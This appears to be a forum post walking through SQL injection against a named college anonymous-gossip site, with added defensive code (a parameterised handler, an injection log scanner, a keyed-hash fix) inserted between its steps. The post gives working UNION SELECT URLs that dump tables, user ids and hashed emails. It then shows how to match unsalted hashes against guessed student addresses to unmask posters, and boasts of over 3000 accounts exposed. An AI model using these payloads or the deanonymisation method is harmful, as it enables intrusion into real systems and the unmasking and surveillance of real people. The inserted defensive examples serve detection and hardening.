The following link shows all of the vulnerable fields on a given webpage (using a
random thread, you could use any one you wanted though)
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
As we can see, 1,3,4,5,6,7,8,9 are all vulnerable fields where we can put data we
want pulled from the SQL database (the thing that holds user IDs and emails).
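The reason a UNION in the id parameter works at all is that the thread page pastes the parameter into its SQL string. The following is an added example, not code from the post or from the site it describes: a constructed SQLite schema (table and column names are assumptions modelled on the names the post lists), a handler written the way the post's URLs imply the real one was, and the hardened form beside it. The payload constant only mirrors the shape of the post's first URL after the web server has turned '+' into spaces.

```python
import sqlite3

# Constructed in-memory schema standing in for the layout the post describes:
# a topics table the thread page legitimately reads, and a users table that
# the thread endpoint should never be able to reach.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE tbl_topics (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE tbl_users  (id INTEGER PRIMARY KEY, email TEXT, school TEXT);
        INSERT INTO tbl_topics VALUES (91305, 'example thread', 'constructed body');
        INSERT INTO tbl_users  VALUES (7, 'user@example.edu', 'example');
        """
    )
    return conn


def thread_vulnerable(conn: sqlite3.Connection, thread_id: str) -> list:
    # The defect behind the post's URLs: the id from the query string is
    # interpolated into SQL, so a UNION inside the parameter rewrites the query.
    sql = f"SELECT id, title, body FROM tbl_topics WHERE id = {thread_id}"
    return conn.execute(sql).fetchall()


def thread_safe(conn: sqlite3.Connection, thread_id: str) -> list:
    # Hardened form: check the type at the edge, then bind the value so the
    # database driver never parses it as SQL syntax.
    if not thread_id.isdigit():
        raise ValueError("thread id must be a positive integer")
    sql = "SELECT id, title, body FROM tbl_topics WHERE id = ?"
    return conn.execute(sql, (int(thread_id),)).fetchall()


# A parameter of the same shape as the post's URL, after the web server has
# turned '+' into spaces; used only to contrast the two functions above.
PAYLOAD = "91305 AND 1=0 UNION SELECT ALL id, email, school FROM tbl_users--"


def demo() -> tuple:
    """Returns (rows the vulnerable handler leaks, what the safe handler does)."""
    conn = build_db()
    leaked = thread_vulnerable(conn, PAYLOAD)
    try:
        safe = thread_safe(conn, PAYLOAD)
    except ValueError:
        safe = "rejected"
    return leaked, safe


if __name__ == "__main__":
    print(demo())
```

The vulnerable handler returns the row from tbl_users even though the statement was written against tbl_topics; the safe handler rejects the value before it ever reaches the database, and even without the isdigit check the bound parameter would be compared as a value, not executed as syntax.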
I'm going to skip a few parts here and get to the nitty-gritty of the matter. The
overall database is called "acb" and it has the following tables:
tbl_attempts,tbl_crush,tbl_emails,tbl_free_posts,tbl_message_headers,tbl_messages,tbl_moderators,tbl_newpasses,tbl_original_posts,tbl_recentmail,tbl_replies,tbl_reports,tbl_schools,tbl_topics,tbl_users,tbl_views,tbl_votes
The thing is, when we specify what table we want to check out, instead of writing
"tbl_users", we have to write it in Hex. So we get the following url (change the
hex code for tbl_users to the hex code for any other table you want):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x74626C5F7573657273--
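The hex-encoded table name is there to avoid quote characters, and it is also what makes these requests easy to pick out of a web-server log. The following is an added example, not part of the post: a small log scanner that URL-decodes the query string the way the server would, flags the indicators visible in the post's URLs (UNION SELECT, information_schema, a trailing comment, 0x literals) and decodes the 0x literals so an analyst sees the table name in clear. The access-log lines and the log-format regex are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the request shapes in the post: a UNION SELECT that
# follows an always-false predicate, a read of information_schema, a trailing
# comment that discards the rest of the original query, and string literals
# written as 0x... hex so no quote character is needed.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "trailing_comment": re.compile(r"--\s*$|/\*"),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)\b", re.I)

# Common log format (constructed regex); only the request path is used here.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_hex_literals(query: str) -> list:
    """Turn 0x... literals back into text so the analyst sees which table name
    or separator the request carried (tbl_users, ':'); odd-length or
    non-ASCII payloads are reported rather than crashing the scan."""
    out = []
    for m in HEX_LITERAL.finditer(query):
        try:
            out.append(bytes.fromhex(m.group(1)).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            out.append("<undecodable:0x%s>" % m.group(1))
    return out


def inspect_path(path: str) -> dict:
    """Decode the query string as the server would and look for indicators."""
    query = path.split("?", 1)[1] if "?" in path else ""
    decoded = unquote_plus(query)  # '+' becomes a space, %xx is decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    literals = decode_hex_literals(decoded)
    if literals:
        hits.append("hex_literal")
    return {"suspicious": bool(hits), "indicators": hits, "hex_literals": literals}


def scan(lines) -> list:
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        result = inspect_path(m.group("path"))
        result.update(ip=m.group("ip"), status=m.group("status"))
        findings.append(result)
    return findings


# Constructed access-log lines: a normal thread view, then a request of the
# shape the post shows for reading column names out of information_schema.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2011:21:03:11 -0500] '
    '"GET /sb.php?school=jhu&page=thread&id=91305 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Mar/2011:21:04:02 -0500] '
    '"GET /sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL'
    '+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14+from+information_'
    'schema.columns+where+table_name=0x74626C5F7573657273-- HTTP/1.1" 200 5301',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two things worth noting when running this against real logs: decode before matching, because the same request can be written with %20, '+' or mixed case, and treat a 200 response to a flagged request as more serious than a 500, since a successful page render means the UNION lined up with the column count.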
What does this mean? It means that every email has a specific ID number attached
to it (as well as the number of bans said person has received). Let's pull out ID
and email, using the following (should be obvious how it was done, if you're
playing along at home):
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(id,0x3a,email),5,6,7,8,9,10,11,12,13,14+from+tbl_users--
But look, the email is encrypted. Any good cryptologist can see that this is just
the SQL PASSWORD() command. While it's very hard to break PASSWORD(), the
designers of the site did something wonderful for us.. "tbl_emails" lists two
fields, "email" and "school". If we run the following, we see users emails and the
school they are associated with..
http://www.collegeacb.com/sb.php?school=jhu&page=thread&id=91305+AND+1=0+UNION+SELECT+ALL+1,2,3,group_concat(email,0x3a,school),5,6,7,8,9,10,11,12,13,14+from+tbl_emails--
Now we can limit the search to only include school "jhu", and once we have all
these emails, we can simply run them through MySQL's PASSWORD() command and match
the encrypted return up with one we pulled from the database, then modify our
search parameters to exclude those emails and continue on ad nauseam.
That's not really what most of us want. We want to see who could probably be
posting about us, or somebody we know. So instead, it's much easier to
encrypt-then-match people's JHED emails that you know. Let's say I think Frat Brother #4
posted something bad about my buddy, luckily I know his name and can guess his
JHED (and, trust me, ~90% of people here signed up with their JHEDs). So I run
PASSWORD(adouche1@jhu.edu), get an encrypted string, and match it up to the data I
pulled so I can see what user-id is attached to it. If there's no hit, I try
PASSWORD(adouche2@jhu.edu), increasing the number up to some reasonable value
before giving up.
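What makes the matching step in the post work is that PASSWORD() takes no salt and no key, so the stored value for an address is the same whoever computes it. The following is an added example, not from the post: it contrasts an unkeyed digest (plain SHA-1 here, an assumption standing in for PASSWORD(); the property, not the function, is the point) with an HMAC under a server-side secret, and includes an exposure check a defender can run over an exported table to see which candidate addresses it still links to. Table contents, addresses and the key are constructed.

```python
import hashlib
import hmac
from typing import Optional


# Stand-in for the site's stored column. The post reports MySQL PASSWORD();
# plain SHA-1 is used here as an assumption so the example runs anywhere. The
# property that matters is shared by both: no salt and no key, so the same
# email always yields the same stored value, which anyone can recompute.
def unkeyed_tag(email: str) -> str:
    return hashlib.sha1(email.strip().lower().encode()).hexdigest()


# Hardened form: an HMAC under a secret that lives outside the database
# (environment, KMS, a config file only the web app reads). The application can
# still look an address up, but an exported table cannot be matched to guesses.
def keyed_tag(email: str, key: bytes) -> str:
    return hmac.new(key, email.strip().lower().encode(), hashlib.sha256).hexdigest()


def build_table(emails, key: Optional[bytes] = None) -> dict:
    """Constructed user table {id: tag}; key=None reproduces the unkeyed scheme."""
    return {
        uid: (unkeyed_tag(e) if key is None else keyed_tag(e, key))
        for uid, e in enumerate(emails, start=1)
    }


def lookup(table: dict, email: str, key: Optional[bytes] = None):
    """The application's own lookup; works for either scheme when it holds the key."""
    wanted = unkeyed_tag(email) if key is None else keyed_tag(email, key)
    for uid, tag in table.items():
        if hmac.compare_digest(tag, wanted):
            return uid
    return None


def exposure(table: dict, candidate_emails) -> dict:
    """Impact assessment for an exported table without the key: which of the
    candidate addresses resolve to a user id by recomputing the unkeyed tag.
    For a keyed table every entry comes back None."""
    index = {tag: uid for uid, tag in table.items()}
    return {e: index.get(unkeyed_tag(e)) for e in candidate_emails}


if __name__ == "__main__":
    key = b"constructed-server-secret"
    emails = ["alice@example.edu", "bob@example.edu"]
    print(exposure(build_table(emails), ["bob@example.edu", "carol@example.edu"]))
    print(exposure(build_table(emails, key), emails))
```

Two caveats: the key must not be stored in the same database, or an injection that dumps tbl_users dumps the key too; and a keyed tag is pseudonymisation, not anonymity, since the operator (or anyone who obtains the key) can still link an address to its id. A per-record random salt is the other standard fix; it stops a single precomputed guess from matching every row, but not a guess recomputed per row, which is why the keyed form is the better fit for this lookup pattern.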
Once we have an email account's ID number, it's all a matter of sorting through
tbl_replies or tbl_topics and sorting by user ID to see what this one person has
posted. There are many more refined methods of doing this, but this is probably
the one people will want to know how to do. It's also possible to just select one
field (I like field 5) in a given thread and have it display that person's id
number, or anything else if you're so possibly inclined. Play around, get a feel
for the database architecture, and you can do some cool stuff.
Oh, and a note to people using emails different from their JHED-given ones.. the
school's database should allow you to tease out what emails are registered to what
JHED-ID (looking at you, pedobear@jhu.edu). Trying to find a way to link them, it
shouldn't be that hard.
Who would go through all of this trouble? Well, it's not that much of a hassle if
you can write up some scripts to do it for you. Which I did.. a little Perl script
that goes through the school's directory (pulled an offline copy), gets each
person's name and makes a presumed JHED email for them based on their first
initial, up to 6 letters of their last name, and gives them a number based on
frequency. It also generates a first-initial-last-name@jhu.edu address to test
too. Then it batch-encrypted them, and matched to ID numbers, and now I've got
over 3000 accounts open for business.
I won't be sharing these. Suffice to say, somebody knows everything you've posted
now. You guys should be nicer to each other.
Total time for the home hacker: 3 hours, give or take. It's a good way to learn
how to NOT set up a secure database, too.
Total time for YOLO: an hour, if you can stick with it. Then you'll know
everything your best friend has been saying about you :) [seriously, watching this
is like watching a soap opera, it's awesome]